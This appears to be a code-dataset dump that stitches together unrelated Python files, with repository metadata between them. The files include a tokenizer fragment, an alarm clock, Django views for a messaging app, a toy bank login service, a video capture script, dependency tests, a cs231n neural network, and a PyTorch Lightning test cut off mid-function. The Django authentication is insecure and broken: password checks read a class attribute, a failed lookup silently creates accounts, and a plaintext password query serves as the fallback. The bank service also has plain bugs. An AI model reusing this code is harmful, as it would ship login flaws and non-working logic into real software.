def nextIsKeyword(tokens, keyword):
if len(tokens) == 0: return False
nextToken = tokens.peekNext()
if isinstance(nextToken, IdentifierToken):
return nextToken.value == keyword
return False
def nextIsLetter(tokens, letter):
if len(tokens) == 0: return False
nextToken = tokens.peekNext()
if isinstance(nextToken, SingleCharToken):
return nextToken.value == letter
return False
def nextIsOneOfLetters(tokens, *letters):
return any(nextIsLetter(tokens, c) for c in letters)
def nextLettersAre(tokens, letters):
if len(tokens) < len(letters): return False
for token, letter in zip(tokens.getLookahead(len(letters)), letters):
if not isinstance(token, SingleCharToken) or token.value != letter:
return False
return True
def nextIsIdentifier(tokens):
if len(tokens) == 0: return False
return isinstance(tokens.peekNext(), IdentifierToken)
def nextIsInteger(tokens):
if len(tokens) == 0: return False
return isinstance(tokens.peekNext(), IntegerToken)
def nextIsComparisonOperator(tokens):
return any(nextLettersAre(tokens, s) for s in comparisonOperators) | [
"mail@jlucke.com"
] | mail@jlucke.com |
643a7b2091b878e7481a7ba0950e51a72cd4a379 | 6a4abacf7005bc4c24e0719b72106415e7e9b905 | /alarm_clock.py | db2bb0abfda575ae2a0c75f163065765dd320983 | [] | no_license | saikarthik007/Alarm-Clock | 342415c60e7b50cff39c36fe254e9cf30deda8c2 | a95fb1745720a73cd67333efdec204e720d4b0ea | refs/heads/main | 2023-06-25T19:25:22.457016 | 2021-08-03T09:56:52 | 2021-08-03T09:56:52 | 392,268,826 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,748 | py | """
Application to set alarm based on date and time
Developed by : Karthik C
"""
import time
from datetime import datetime
from playsound import playsound
class AlarmClock:
"""class to set alarm on time based on user input"""
def __init__(self, alarm_date, alarm_time):
""" init function"""
self.alarm_time = alarm_time
self.alarm_date = alarm_date
def set_alarm(self):
""" function to trigger alarm"""
while True:
time.sleep(1)
current_time = datetime.now()
now = current_time.strftime("%H:%M:%S")
date = current_time.strftime("%d/%m/%Y")
if date == self.alarm_date and now == self.alarm_time:
print("Time to Wake up")
playsound('alarm.mp3')
break
def verify_user_input(self):
"""verify user given date and time is not in past"""
current_time = datetime.now()
now = current_time.strftime("%H:%M:%S")
date = current_time.strftime("%d/%m/%Y")
if self.alarm_date < date:
print("Entered date is in past cant set alarm!")
elif self.alarm_time < now:
print("Entered time is in past cant set alarm!")
else:
print("Setting up alarm...")
self.set_alarm()
if __name__ == "__main__":
# get date from user to set alarm on particular date
ALARM_DAY = input("Enter the date to set alarm : DD/MM/YYYY\n")
# get time from user to set alarm on time
ALARM_TIME = input("Enter the time to set alarm : HH:MM:SS\n")
# verify user given date and time is not in past
AlarmClock(ALARM_DAY, ALARM_TIME).verify_user_input()
| [
"noreply@github.com"
] | noreply@github.com |
3187010c119673201a32665997e3af25e74ff962 | c4caf34cfdbce7a843c5be6b8776334015fac9bd | /v1/views.py | 173a484d0192c4b0e0bdeb8cfa26d120a0194f06 | [] | no_license | DanielVisca/Thinking-of-You-Server | 9c84c23adc5cb693643ceaa249d6704fb93a1f47 | 14834c49467e54ae9d1727a5cf15344e5bf9b3df | refs/heads/master | 2022-04-23T01:15:32.199666 | 2020-04-14T00:40:24 | 2020-04-14T00:40:24 | 255,435,760 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,877 | py | from django.http import HttpResponse, JsonResponse
from v1.models import *
from rest_framework.decorators import api_view
from rest_framework.decorators import parser_classes
from rest_framework.parsers import JSONParser
from django.shortcuts import render
from django.core.exceptions import ObjectDoesNotExist
import json
import server.secure as secure
import requests
# Security
from django.contrib.auth.hashers import make_password, check_password
from secrets import token_urlsafe
# Create your views here.
@api_view(['post'])
@parser_classes([JSONParser])
def send_toy(request):
requestJSONh = json.loads(request.header)
requestJSONb = json.loads(request.body)
auth_token = requestJSONh['key']
send_to_id = requestJSONb["send_to_phone_number"]
try:
receiver = User.objects.get(phone_number=send_to_id)
sender = User.objects.get(auth_token=auth_token)
# Create a 'Thinking of You' object
TOY.objects.create(
sender=sender,
receiver=receiver,
)
except ObjectDoesNotExist:
return JsonResponse(status=400, data={'success': False, 'msg': 'send failure'})
return JsonResponse({'success': True})
@api_view(['post'])
@parser_classes([JSONParser])
def init(request):
"""
When a user logs in, this method is called. Check if the user is in the database,
if they are return auth token and mark as active, if they aren't, deny access.
"""
try:
requestJSON = json.loads(request.body)
print("request: "+ str(requestJSON))
user_phone_number = requestJSON['phone_number']
user_password = requestJSON['password']
# Authentication, might throw an ObjectDoesNotExist error
user = user_authenticate(user_phone_number,user_password)
if user is None:
print("Authentication failed")
user = User.objects.get(phone_number=user_phone_number, password=user_password)
else:
print("authentication worked")
# Set the user to active and generate an auth token for them
user.active = True
user_auth_token = token_urlsafe(64)
user.auth_token = user_auth_token
user.save()
return JsonResponse(data={
'success': True,
'user_auth_token': user.auth_token
})
except (json.JSONDecodeError):
# These errors imply invalid json, so we send 400
return JsonResponse(status=400, data={'success': False})
except (KeyError):
# These errors imply invalid json, so we send 400
return JsonResponse(status=400, data={'success': False})
except Exception as e: # django.core.exceptions.ObjectDoesNotExist
# All other errors imply invalid authentication, so we send 401
print(e)
return JsonResponse(status=401, data={'success': False})
# Shouldn't get here, something's gone wrong
return JsonResponse(status=500, data={'success': False})
# Helper Functions
def user_authenticate(user_phone_number=None, password=None, first_name=None, last_name=None, phone_number=None, username=None):
"""
Authenticate a user
"""
try:
user = User.objects.get(phone_number=user_phone_number)
pwd = User.password
pwd_valid = check_password(password, pwd)
if pwd_valid is False:
print("wrong password")
return None
else: return User
except: # User does not exist, creating new driver
hashed_pwd = make_password(password)
user = User.objects.create(phone_number=user_phone_number,password=hashed_pwd)
#user = User.objects.create(first_name=first_name,last_name=last_name,phone_number=user_phone_number,password=hashed_pwd)
print("User: " + str(user))
pwd_valid = check_password(password, hashed_pwd)
return user | [
"danielvisca96@gmail.com"
] | danielvisca96@gmail.com |
98a42ed886c33115fee8f67642016d2738ab1d25 | d60be98f0b9b81249cc2c565796062b4a1c32197 | /bank/AuthenticationService.py | 3cb578a7e9921d4ffeb253cb0a15b0cfc425715e | [] | no_license | softchris/katas | 5a667547a32b5ea7135263d5e22774516f104ac5 | 946c0a514a528a40dc937f8d92ccc173eee58c0e | refs/heads/master | 2021-01-01T05:48:34.932361 | 2013-07-26T18:31:41 | 2013-07-26T18:31:41 | 11,687,335 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 522 | py | import User
class AuthenticationService:
def __init__(self):
self.isAuthenticated
self.user = None
self.users = []
def initUsers(self):
user = User.User("pelle","persson")
self.users.push(user)
def login(user,self,username,password):
for user in self.users:
if user.username == username and user.password == password:
self.isAuthenticated = True
def getUser(self,username):
returnValue = None
for user in self.users:
if user.username == username:
returnValue = user
return returnValue | [
"christoffer.noring@softhouse.se"
] | christoffer.noring@softhouse.se |
ad8c19923c52f03b06c8c3c8ad57650d961ed9e0 | ccddedd15256742713ed8298f50fbd9f29238d38 | /Misc/video_capture.py | e25bbc2ca7b0b7accc43aa58470706e13027423e | [] | no_license | roshankr/DS_Competition | d9c27915eddfa0b39b20445882442b15975d6e5e | c765172f1f673fd3c774a4c3b45f61e41e7e5e52 | refs/heads/master | 2021-01-10T04:26:24.417215 | 2019-01-02T21:02:39 | 2019-01-02T21:02:39 | 44,562,738 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,915 | py | #!/usr/bin/python
import platform
import sys
import os
import pickle
import time as tm
import pandas as pd
from sklearn.feature_extraction.text import CountVectorizer
from sklearn.feature_extraction.text import TfidfTransformer
from sklearn.multiclass import OneVsRestClassifier
from sklearn.svm import SVC
from sklearn.linear_model import SGDClassifier
from datetime import datetime, timedelta
import numpy as np
import cv2
import xgboost
def videocapture():
filename = os.path.join(file_path, 'FlickAnimation.avi')
cap = cv2.VideoCapture(filename)
X_test = []
while (True):
# Capture frame-by-frame
ret, frame = cap.read()
if ret:
# Our operations on the frame come here
#frame = frame*(1. / 255)
X_test.append(frame)
#gray = cv2.cvtColor(frame, cv2.COLOR_BGR2Luv)
gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
# Display the resulting frame
#cv2.imshow('frame', gray)
#tm.sleep(6)
#sys.exit(0)
#if cv2.waitKey(1) & 0xFF == ord('q'):
# break
else:
i= 0
for img in X_test:
gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
cv2.imshow('frame'+str(i), gray)
i = i +1
if cv2.waitKey(1) & 0xFF == ord('q'):
break
#tm.sleep(60)
#break
# When everything done, release the capture
#cap.release()
#cv2.destroyAllWindows()
if __name__ == "__main__":
global file_path
print("video capturing....... at Time: %s" % (tm.strftime("%H:%M:%S")))
if(platform.system() == "Windows"):
file_path = 'C:\\Python\\Others\\data\\test'
else:
file_path = '/mnt/hgfs/Python/Others/data/test/'
# try:
videocapture()
print("--------------- END train.")
| [
"roshankr@gmail.com"
] | roshankr@gmail.com |
84a53172ac55cc0fb355a96df27090c3e5ccdad8 | 2f3991446af4dff47d9bbc6192c92af45efe88c2 | /level3-dependencies/test_build_order_private.py | 55afb702d106863bfe83993eb3e7addc55c75430 | [] | no_license | fedora-python/pyconcz-challenge | e3b2fc6ab9caebe9c3f55b6f89d9aea7481f8429 | f3b038fe1eb4d76d2e99f0e32a34a3f7716a2670 | refs/heads/master | 2022-11-17T01:16:01.307190 | 2022-10-31T10:25:02 | 2022-10-31T10:25:02 | 93,522,072 | 3 | 6 | null | 2022-10-31T10:25:03 | 2017-06-06T13:33:01 | Python | UTF-8 | Python | false | false | 1,565 | py | import pytest
def is_valid_result(pkgs, result):
built = {pkg: False for pkg in pkgs}
for pkg in result:
if pkg not in built:
print(f'{pkg} was not supposed to be built at all')
return False
if built[pkg]:
print(f'{pkg} already built')
return False
for dependency in pkgs[pkg]:
if not built[dependency]:
print(f'{pkg} needs {dependency} but that was not yet built')
return False
built[pkg] = True
for key, value in built.items():
if not value:
print(f'{key} not built at the end')
return False
return True
VALIDS = [
{
'a': ['b', 'c', 'd'],
'b': ['d'],
'c': ['d'],
'd': [],
},
{
'a': [],
'b': [],
'c': [],
'd': [],
'e': ['f'],
'f': [],
'g': [],
},
{
'.': [],
'a': ['.'],
'b': ['.', 'a'],
'c': ['.', 'a', 'b'],
'd': ['.', 'a', 'b', 'c'],
},
{
'.': [],
},
]
INVALIDS = [
{
'a': ['a'],
},
{
'a': ['nonexistent'],
},
{
'a': ['b'],
'b': ['c'],
'c': ['d'],
'd': ['a'],
},
]
@pytest.mark.parametrize('pkgs', VALIDS)
def test_valids(module, pkgs):
assert is_valid_result(pkgs, module.build_order(pkgs))
@pytest.mark.parametrize('pkgs', INVALIDS)
def test_invalids(module, pkgs):
with pytest.raises(ValueError):
module.build_order(pkgs)
| [
"lbalhar@redhat.com"
] | lbalhar@redhat.com |
f8128fff9d6839dfb0a004533a916b2972314baa | 2111790241a7fb0501fc1561c040d4147795013c | /libs/drf_auth/drf_auth/__init__.py | 8849f032d057925d80c04362a1438de4f3f7ba20 | [
"LicenseRef-scancode-unknown-license-reference",
"MulanPSL-1.0",
"LicenseRef-scancode-mulanpsl-1.0-en"
] | permissive | cnicgpaul123/killNCP | e67d6030bf8a5f3cb739de9c1e5c02e65b688efb | aa153919389784354d1efa0c9669393a7ffe7cf7 | refs/heads/master | 2022-12-12T10:31:32.696763 | 2020-02-24T06:35:55 | 2020-02-24T06:35:55 | 242,639,784 | 6 | 0 | NOASSERTION | 2022-12-08T05:26:34 | 2020-02-24T03:39:51 | Python | UTF-8 | Python | false | false | 548 | py | # -*- coding: utf-8 -*-
"""
Licensed under the MIT License (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at http://opensource.org/licenses/MIT
Unless required by applicable law or agreed to in writing,
software distributed under the License is distributed on
an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and limitations under the License.
"""
__version__ = "1.0.1"
| [
""
] | |
154873806933fc5055c4498b02af97faca74ccf3 | e0c6c2a5e87c51d84add566c2410bf2dcbd7bc42 | /cs231n/classifiers/fc_net.py | a38254c51cd959c26049e5e48638391f1cfa8590 | [] | no_license | aashish2894/cifar10_convnet | b1f5042f4a878d4a4f8bacabad767f8c96a10d0c | 1df93036c5ae59ab5bdf0591498b46d2090e845f | refs/heads/master | 2021-10-02T18:30:18.613270 | 2018-11-30T03:27:05 | 2018-11-30T03:27:05 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 17,670 | py | from builtins import range
from builtins import object
import numpy as np
from cs231n.layers import *
from cs231n.layer_utils import *
class TwoLayerNet(object):
"""
A two-layer fully-connected neural network with ReLU nonlinearity and
softmax loss that uses a modular layer design. We assume an input dimension
of D, a hidden dimension of H, and perform classification over C classes.
The architecure should be affine - relu - affine - softmax.
Note that this class does not implement gradient descent; instead, it
will interact with a separate Solver object that is responsible for running
optimization.
The learnable parameters of the model are stored in the dictionary
self.params that maps parameter names to numpy arrays.
"""
def __init__(self, input_dim=3*32*32, hidden_dim=100, num_classes=10,
weight_scale=1e-3, reg=0.0):
"""
Initialize a new network.
Inputs:
- input_dim: An integer giving the size of the input
- hidden_dim: An integer giving the size of the hidden layer
- num_classes: An integer giving the number of classes to classify
- dropout: Scalar between 0 and 1 giving dropout strength.
- weight_scale: Scalar giving the standard deviation for random
initialization of the weights.
- reg: Scalar giving L2 regularization strength.
"""
self.params = {}
self.reg = reg
############################################################################
# TODO: Initialize the weights and biases of the two-layer net. Weights #
# should be initialized from a Gaussian with standard deviation equal to #
# weight_scale, and biases should be initialized to zero. All weights and #
# biases should be stored in the dictionary self.params, with first layer #
# weights and biases using the keys 'W1' and 'b1' and second layer weights #
# and biases using the keys 'W2' and 'b2'. #
############################################################################
self.params['W1'] = weight_scale * np.random.randn(input_dim, hidden_dim)
self.params['b1'] = np.zeros(hidden_dim)
self.params['W2'] = weight_scale * np.random.randn(hidden_dim, num_classes)
self.params['b2'] = np.zeros(num_classes)
############################################################################
# END OF YOUR CODE #
############################################################################
def loss(self, X, y=None):
"""
Compute loss and gradient for a minibatch of data.
Inputs:
- X: Array of input data of shape (N, d_1, ..., d_k)
- y: Array of labels, of shape (N,). y[i] gives the label for X[i].
Returns:
If y is None, then run a test-time forward pass of the model and return:
- scores: Array of shape (N, C) giving classification scores, where
scores[i, c] is the classification score for X[i] and class c.
If y is not None, then run a training-time forward and backward pass and
return a tuple of:
- loss: Scalar value giving the loss
- grads: Dictionary with the same keys as self.params, mapping parameter
names to gradients of the loss with respect to those parameters.
"""
scores = None
W1 = self.params['W1']
b1 = self.params['b1']
W2 = self.params['W2']
b2 = self.params['b2']
############################################################################
# TODO: Implement the forward pass for the two-layer net, computing the #
# class scores for X and storing them in the scores variable. #
############################################################################
a, fc_cache = affine_forward(X, W1, b1)
out_hidden, relu_cache = relu_forward(a)
cache_hidden_layer = (fc_cache, relu_cache)
scores, out_cache = affine_forward(out_hidden, W2, b2)
############################################################################
# END OF YOUR CODE #
############################################################################
# If y is None then we are in test mode so just return scores
if y is None:
return scores
loss, grads = 0, {}
############################################################################
# TODO: Implement the backward pass for the two-layer net. Store the loss #
# in the loss variable and gradients in the grads dictionary. Compute data #
# loss using softmax, and make sure that grads[k] holds the gradients for #
# self.params[k]. Don't forget to add L2 regularization! #
# #
# NOTE: To ensure that your implementation matches ours and you pass the #
# automated tests, make sure that your L2 regularization includes a factor #
# of 0.5 to simplify the expression for the gradient. #
############################################################################
loss, dscores = softmax_loss(scores,y)
loss = loss + 0.5*self.reg*np.sum(W1*W1) + 0.5*self.reg*np.sum(W2*W2)
dx1, dW2, db2 = affine_backward(dscores, out_cache)
dx, dW1, db1 = affine_relu_backward(dx1, cache_hidden_layer)
dW1 = dW1 + self.reg*W1
dW2 = dW2 + self.reg*W2
grads['W1'] = dW1
grads['b1'] = db1
grads['W2'] = dW2
grads['b2'] = db2
############################################################################
# END OF YOUR CODE #
############################################################################
return loss, grads
class FullyConnectedNet(object):
"""
A fully-connected neural network with an arbitrary number of hidden layers,
ReLU nonlinearities, and a softmax loss function. This will also implement
dropout and batch normalization as options. For a network with L layers,
the architecture will be
{affine - [batch norm] - relu - [dropout]} x (L - 1) - affine - softmax
where batch normalization and dropout are optional, and the {...} block is
repeated L - 1 times.
Similar to the TwoLayerNet above, learnable parameters are stored in the
self.params dictionary and will be learned using the Solver class.
"""
def __init__(self, hidden_dims, input_dim=3*32*32, num_classes=10,
dropout=0, use_batchnorm=False, reg=0.0,
weight_scale=1e-2, dtype=np.float32, seed=None):
"""
Initialize a new FullyConnectedNet.
Inputs:
- hidden_dims: A list of integers giving the size of each hidden layer.
- input_dim: An integer giving the size of the input.
- num_classes: An integer giving the number of classes to classify.
- dropout: Scalar between 0 and 1 giving dropout strength. If dropout=0 then
the network should not use dropout at all.
- use_batchnorm: Whether or not the network should use batch normalization.
- reg: Scalar giving L2 regularization strength.
- weight_scale: Scalar giving the standard deviation for random
initialization of the weights.
- dtype: A numpy datatype object; all computations will be performed using
this datatype. float32 is faster but less accurate, so you should use
float64 for numeric gradient checking.
- seed: If not None, then pass this random seed to the dropout layers. This
will make the dropout layers deteriminstic so we can gradient check the
model.
"""
self.use_batchnorm = use_batchnorm
self.use_dropout = dropout > 0
self.reg = reg
self.num_layers = 1 + len(hidden_dims)
self.dtype = dtype
self.params = {}
############################################################################
# TODO: Initialize the parameters of the network, storing all values in #
# the self.params dictionary. Store weights and biases for the first layer #
# in W1 and b1; for the second layer use W2 and b2, etc. Weights should be #
# initialized from a normal distribution with standard deviation equal to #
# weight_scale and biases should be initialized to zero. #
# #
# When using batch normalization, store scale and shift parameters for the #
# first layer in gamma1 and beta1; for the second layer use gamma2 and #
# beta2, etc. Scale parameters should be initialized to one and shift #
# parameters should be initialized to zero. #
############################################################################
dims = [input_dim] + hidden_dims + [num_classes]
for i in range(self.num_layers):
self.params['b%d'%(i+1)] = np.zeros(dims[i+1])
self.params['W%d'%(i+1)] = np.random.randn(dims[i],dims[i+1])*weight_scale
if self.use_batchnorm:
for i in range(self.num_layers-1):
self.params['gamma%d'%(i+1)] = np.ones(dims[i+1])
self.params['beta%d'%(i+1)] = np.zeros(dims[i+1])
############################################################################
# END OF YOUR CODE #
############################################################################
# When using dropout we need to pass a dropout_param dictionary to each
# dropout layer so that the layer knows the dropout probability and the mode
# (train / test). You can pass the same dropout_param to each dropout layer.
self.dropout_param = {}
if self.use_dropout:
self.dropout_param = {'mode': 'train', 'p': dropout}
if seed is not None:
self.dropout_param['seed'] = seed
# With batch normalization we need to keep track of running means and
# variances, so we need to pass a special bn_param object to each batch
# normalization layer. You should pass self.bn_params[0] to the forward pass
# of the first batch normalization layer, self.bn_params[1] to the forward
# pass of the second batch normalization layer, etc.
self.bn_params = []
if self.use_batchnorm:
self.bn_params = [{'mode': 'train'} for i in range(self.num_layers - 1)]
# Cast all parameters to the correct datatype
for k, v in self.params.items():
self.params[k] = v.astype(dtype)
def loss(self, X, y=None):
"""
Compute loss and gradient for the fully-connected net.
Input / output: Same as TwoLayerNet above.
"""
X = X.astype(self.dtype)
mode = 'test' if y is None else 'train'
# Set train/test mode for batchnorm params and dropout param since they
# behave differently during training and testing.
if self.use_dropout:
self.dropout_param['mode'] = mode
if self.use_batchnorm:
for bn_param in self.bn_params:
bn_param['mode'] = mode
scores = None
############################################################################
# TODO: Implement the forward pass for the fully-connected net, computing #
# the class scores for X and storing them in the scores variable. #
# #
# When using dropout, you'll need to pass self.dropout_param to each #
# dropout forward pass. #
# #
# When using batch normalization, you'll need to pass self.bn_params[0] to #
# the forward pass for the first batch normalization layer, pass #
# self.bn_params[1] to the forward pass for the second batch normalization #
# layer, etc. #
############################################################################
layer = {}
layer[0] = X
cache_layer = {}
dropout_cache = {}
#for i in range(1,self.num_layers):
# layer[i], cache_layer[i] = affine_relu_forward(layer[i-1],self.params['W%d' %i],self.params['b%d' %i])
## batch normaliztion
for i in range(1,self.num_layers):
if self.use_batchnorm:
layer[i], cache_layer[i] = affine_norm_relu_forward(layer[i-1], self.params['W%d' %i], self.params['b%d' %i], self.params['gamma%d' %i], self.params['beta%d' %i], self.bn_params[i-1])
else:
layer[i], cache_layer[i] = affine_relu_forward(layer[i-1],self.params['W%d' %i],self.params['b%d' %i])
if self.use_dropout:
layer[i], dropout_cache[i] = dropout_forward(layer[i], self.dropout_param)
# last layer
Wlast = 'W%d' %self.num_layers
blast = 'b%d' %self.num_layers
scores, cache_scores = affine_forward(layer[self.num_layers-1],self.params[Wlast],self.params[blast])
############################################################################
# END OF YOUR CODE #
############################################################################
# If test mode return early
if mode == 'test':
return scores
loss, grads = 0.0, {}
############################################################################
# TODO: Implement the backward pass for the fully-connected net. Store the #
# loss in the loss variable and gradients in the grads dictionary. Compute #
# data loss using softmax, and make sure that grads[k] holds the gradients #
# for self.params[k]. Don't forget to add L2 regularization! #
# #
# When using batch normalization, you don't need to regularize the scale #
# and shift parameters. #
# #
# NOTE: To ensure that your implementation matches ours and you pass the #
# automated tests, make sure that your L2 regularization includes a factor #
# of 0.5 to simplify the expression for the gradient. #
############################################################################
loss, dscores = softmax_loss(scores,y)
for i in range(1,self.num_layers+1):
loss = loss + 0.5*self.reg*np.sum(self.params['W%d' %i]*self.params['W%d' %i])
dx = {}
dx[self.num_layers], grads[Wlast], grads[blast]=affine_backward(dscores,cache_scores)
grads[Wlast] += self.reg*self.params[Wlast]
for i in reversed(range(1,self.num_layers)):
if self.use_dropout:
dx[i+1] = dropout_backward(dx[i+1], dropout_cache[i])
if self.use_batchnorm:
dx[i], grads['W%d' %i], grads['b%d' %i], grads['gamma%d' %i], grads['beta%d' %i] = affine_norm_relu_backward(dx[i+1],cache_layer[i])
grads['W%d' %i] += self.reg*self.params['W%d' %i]
else:
dx[i], grads['W%d' %i], grads['b%d' %i] = affine_relu_backward(dx[i+1],cache_layer[i])
grads['W%d' %i] += self.reg*self.params['W%d' %i]
## Batch normalization
############################################################################
# END OF YOUR CODE #
############################################################################
return loss, grads
def affine_norm_relu_forward(x, w, b, gamma, beta, bn_param):
"""
Convenience layer that perorms an affine transform followed by a ReLU
Inputs:
- x: Input to the affine layer
- w, b: Weights for the affine layer
- gamma, beta : Weight for the batch norm regularization
- bn_params : Contain variable use to batch norml, running_mean and var
Returns a tuple of:
- out: Output from the ReLU
- cache: Object to give to the backward pass
"""
h, h_cache = affine_forward(x, w, b)
hnorm, hnorm_cache = batchnorm_forward(h, gamma, beta, bn_param)
hnormrelu, relu_cache = relu_forward(hnorm)
cache = (h_cache, hnorm_cache, relu_cache)
return hnormrelu, cache
def affine_norm_relu_backward(dout, cache):
"""
Backward pass for the affine-relu convenience layer
"""
h_cache, hnorm_cache, relu_cache = cache
dhnormrelu = relu_backward(dout, relu_cache)
dhnorm, dgamma, dbeta = batchnorm_backward_alt(dhnormrelu, hnorm_cache)
dx, dw, db = affine_backward(dhnorm, h_cache)
return dx, dw, db, dgamma, dbeta
| [
"anshu.2894@gmail.com"
] | anshu.2894@gmail.com |
96e37d7f2ee89bdab87e242f7b8a2d08be5778a4 | d853a0103622cc3b3ada632b9c33c131bdad3a2d | /tests/callbacks/test_stochastic_weight_avg.py | e10f99d33d564dd5019c7a7af229d2aa2ee1fb51 | [
"Apache-2.0"
] | permissive | acharjee07/pytorch-lightning | aad24f872dbfd815585fa7cf2b6594ebe27eb2b1 | 2ee3127661493ba5d0513e543a78b6596f0a216b | refs/heads/master | 2023-09-05T20:58:44.829610 | 2021-10-25T17:33:52 | 2021-10-25T17:33:52 | 421,125,136 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 10,883 | py | # Copyright The PyTorch Lightning team.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
from unittest import mock
import pytest
import torch
from torch import nn
from torch.optim.swa_utils import SWALR
from torch.utils.data import DataLoader
from pytorch_lightning import LightningModule, Trainer
from pytorch_lightning.accelerators import Accelerator
from pytorch_lightning.callbacks import StochasticWeightAveraging
from pytorch_lightning.plugins import DDPSpawnPlugin
from pytorch_lightning.utilities.exceptions import MisconfigurationException
from tests.helpers.boring_model import BoringModel, RandomDataset, RandomIterableDataset
from tests.helpers.runif import RunIf
class SwaTestModel(BoringModel):
def __init__(self, batchnorm: bool = True, interval: str = "epoch", iterable_dataset: bool = False):
super().__init__()
layers = [nn.Linear(32, 32)]
if batchnorm:
layers.append(nn.BatchNorm1d(32))
layers += [nn.ReLU(), nn.Linear(32, 2)]
self.layer = nn.Sequential(*layers)
self.interval = interval
self.iterable_dataset = iterable_dataset
def training_step(self, batch, batch_idx):
output = self.forward(batch)
loss = self.loss(batch, output)
return {"loss": loss}
def train_dataloader(self):
dset_cls = RandomIterableDataset if self.iterable_dataset else RandomDataset
dset = dset_cls(32, 64)
return DataLoader(dset, batch_size=2)
def configure_optimizers(self):
optimizer = torch.optim.SGD(self.layer.parameters(), lr=0.1)
return {
"optimizer": optimizer,
"lr_scheduler": {
"scheduler": torch.optim.lr_scheduler.StepLR(optimizer, step_size=1),
"interval": self.interval,
},
}
class SwaTestCallback(StochasticWeightAveraging):
update_parameters_calls: int = 0
transfer_weights_calls: int = 0
def update_parameters(self, *args, **kwargs):
self.update_parameters_calls += 1
return StochasticWeightAveraging.update_parameters(*args, **kwargs)
def transfer_weights(self, *args, **kwargs):
self.transfer_weights_calls += 1
return StochasticWeightAveraging.transfer_weights(*args, **kwargs)
def on_train_epoch_start(self, trainer, *args):
super().on_train_epoch_start(trainer, *args)
assert trainer.fit_loop._skip_backward == (trainer.current_epoch > self.swa_end)
if self.swa_start <= trainer.current_epoch:
assert isinstance(trainer.lr_schedulers[0]["scheduler"], SWALR)
assert trainer.lr_schedulers[0]["interval"] == "epoch"
assert trainer.lr_schedulers[0]["frequency"] == 1
def on_train_epoch_end(self, trainer, *args):
super().on_train_epoch_end(trainer, *args)
if self.swa_start <= trainer.current_epoch <= self.swa_end:
swa_epoch = trainer.current_epoch - self.swa_start
assert self.n_averaged == swa_epoch + 1
elif trainer.current_epoch > self.swa_end:
assert self.n_averaged == self._max_epochs - self.swa_start
def on_train_end(self, trainer, pl_module):
super().on_train_end(trainer, pl_module)
# make sure these are correctly set again
assert not trainer.fit_loop._skip_backward
assert trainer.accumulate_grad_batches == 2
assert trainer.num_training_batches == 5
if not isinstance(trainer.training_type_plugin, DDPSpawnPlugin):
# check backward call count. the batchnorm update epoch should not backward
assert trainer.accelerator.backward.call_count == trainer.max_epochs * trainer.limit_train_batches
# check call counts
assert self.update_parameters_calls == trainer.max_epochs - (self._swa_epoch_start - 1)
assert self.transfer_weights_calls == 1
def train_with_swa(
tmpdir, batchnorm=True, strategy=None, gpus=None, num_processes=1, interval="epoch", iterable_dataset=False
):
model = SwaTestModel(batchnorm=batchnorm, interval=interval, iterable_dataset=iterable_dataset)
swa_start = 2
max_epochs = 5
swa_callback = SwaTestCallback(swa_epoch_start=swa_start, swa_lrs=0.1)
assert swa_callback.update_parameters_calls == 0
assert swa_callback.transfer_weights_calls == 0
trainer = Trainer(
default_root_dir=tmpdir,
enable_progress_bar=False,
max_epochs=max_epochs,
limit_train_batches=5,
limit_val_batches=0,
callbacks=[swa_callback],
accumulate_grad_batches=2,
strategy=strategy,
gpus=gpus,
num_processes=num_processes,
)
with mock.patch.object(Accelerator, "backward", wraps=trainer.accelerator.backward):
trainer.fit(model)
# check the model is the expected
assert trainer.lightning_module == model
@RunIf(min_gpus=2, special=True)
def test_swa_callback_ddp(tmpdir):
train_with_swa(tmpdir, strategy="ddp", gpus=2)
@RunIf(min_gpus=2)
def test_swa_callback_ddp_spawn(tmpdir):
train_with_swa(tmpdir, strategy="ddp_spawn", gpus=2)
@RunIf(skip_windows=True)
def test_swa_callback_ddp_cpu(tmpdir):
train_with_swa(tmpdir, strategy="ddp_spawn", num_processes=2)
@RunIf(min_gpus=1)
def test_swa_callback_1_gpu(tmpdir):
train_with_swa(tmpdir, gpus=1)
@pytest.mark.parametrize("batchnorm", (True, False))
@pytest.mark.parametrize("iterable_dataset", (True, False))
def test_swa_callback(tmpdir, batchnorm: bool, iterable_dataset: bool):
train_with_swa(tmpdir, batchnorm=batchnorm, iterable_dataset=iterable_dataset)
@pytest.mark.parametrize("interval", ("epoch", "step"))
def test_swa_callback_scheduler_step(tmpdir, interval: str):
train_with_swa(tmpdir, interval=interval)
def test_swa_warns(tmpdir, caplog):
model = SwaTestModel(interval="step")
trainer = Trainer(default_root_dir=tmpdir, fast_dev_run=True, stochastic_weight_avg=True)
with caplog.at_level(level=logging.INFO), pytest.warns(UserWarning, match="SWA is currently only supported"):
trainer.fit(model)
assert "Swapping scheduler `StepLR` for `SWALR`" in caplog.text
def test_swa_raises():
with pytest.raises(MisconfigurationException, match=">0 integer or a float between 0 and 1"):
StochasticWeightAveraging(swa_epoch_start=0, swa_lrs=0.1)
with pytest.raises(MisconfigurationException, match=">0 integer or a float between 0 and 1"):
StochasticWeightAveraging(swa_epoch_start=1.5, swa_lrs=0.1)
with pytest.raises(MisconfigurationException, match=">0 integer or a float between 0 and 1"):
StochasticWeightAveraging(swa_epoch_start=-1, swa_lrs=0.1)
with pytest.raises(MisconfigurationException, match="positive float, or a list of positive floats"):
StochasticWeightAveraging(swa_epoch_start=5, swa_lrs=[0.2, 1])
@pytest.mark.parametrize("stochastic_weight_avg", [False, True])
@pytest.mark.parametrize("use_callbacks", [False, True])
def test_trainer_and_stochastic_weight_avg(tmpdir, use_callbacks: bool, stochastic_weight_avg: bool):
